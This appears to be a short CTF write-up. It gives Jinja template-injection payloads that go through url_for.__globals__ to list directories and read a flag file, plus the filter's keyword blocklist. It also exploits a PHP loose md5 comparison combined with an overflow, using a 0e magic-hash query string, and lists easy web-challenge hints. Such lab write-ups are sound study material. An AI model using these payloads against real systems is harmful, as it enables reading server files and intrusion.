hackit&icewp

For hackit I only looked at one challenge, yet another Python sandbox...

hackit

The reason I want to write it down is that it uses url_for from tokyo.

Fuzzing showed the filter blocks:

["[","]","config","self","from_pyfile","|","join","mro","class","request","pop","attr","args","+"]
{{url_for.__globals__.__getitem__('os').listdir('./')}}
{{url_for.__globals__.__getitem__('__builtins__').__getitem__('open')('flag_secret_file_910230912900891283').read()}}

Or:

{{url_for.__globals__.send_file('/opt/app/flag_secret_file_910230912900891283').response.text}}

References
https://ctftime.org/writeup/11002
https://graneed.hatenablog.com/entry/2018/09/10/180318

OK, one more challenge.

<?php
include 'flag.php';
$username = substr($_GET['u'],0,25);
$password = substr($_GET['p'],0,45);
echo "Hello <b>Baby:</b><br>You may need <a href=\"/?source\">this</a> and/or <a href=\"/auth.so\">this</a><br>";
if (isset($_GET['source'])){
show_source(__FILE__);
}
$digest = @auth($username,$password);
if (md5($username) == md5($digest) and $digest !== $username){
echo "you are a good boy here is your flag : <b>$flag</b>";
}
else {
echo "you are not a good boy so no flag for you :(";
}

$digest = @auth($username,$password); I don't know what auth() does.

They also give you the .so, so it's reversing again... but an overflow can be spotted fairly quickly, no need to reverse the whole thing.

So it's the md5 == weakness, plus the overflow; brute-force until it hits:

?u=240610708&p=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA240610708
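As an added illustration (not from the original post), this Python snippet models the PHP `==` weakness the check above relies on: any two inputs whose md5 hex digest is `0e` followed only by digits are parsed by PHP 5/7 as the float 0.0, so `md5($username) == md5($digest)` passes while `$digest !== $username` still holds. `240610708` is the value from the writeup; `QNKCDZO` is a second publicly known string with a `0e...` md5, used here as the stand-in for whatever the overflowed `auth()` returns.

```python
import hashlib
import hmac
import re

# PHP 5/7 "numeric string" shape (sign, mantissa, optional exponent).
# Strings like "0e4620974..." match, so they compare as floats: 0.0 == 0.0.
NUMERIC_STRING = re.compile(r"^\s*[+-]?(\d+\.?\d*|\.\d+)([eE][+-]?\d+)?\s*$")


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def is_php_numeric(s: str) -> bool:
    return NUMERIC_STRING.match(s) is not None


def php_loose_equal(a: str, b: str) -> bool:
    """Approximation of PHP 7 '==' on two strings: numeric strings compare numerically."""
    if is_php_numeric(a) and is_php_numeric(b):
        return float(a) == float(b)
    return a == b


def is_magic_md5_preimage(s: str) -> bool:
    """True when md5(s) is '0e' + digits only, i.e. PHP reads it as 0.0."""
    return re.fullmatch(r"0e\d+", md5_hex(s)) is not None


def passes_challenge_check(username: str, digest: str) -> bool:
    """Mirror of: md5($username) == md5($digest) and $digest !== $username."""
    return php_loose_equal(md5_hex(username), md5_hex(digest)) and digest != username


def safe_compare(a: str, b: str) -> bool:
    """What the fix looks like: strict, constant-time comparison (PHP: === / hash_equals)."""
    return hmac.compare_digest(a.encode(), b.encode())
```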

ice

The web challenges were very easy.

1. https, 御剑 can scan it
robots.txt

2. in the css

3. just visit a page that doesn't exist

4. cookies
decode the jwt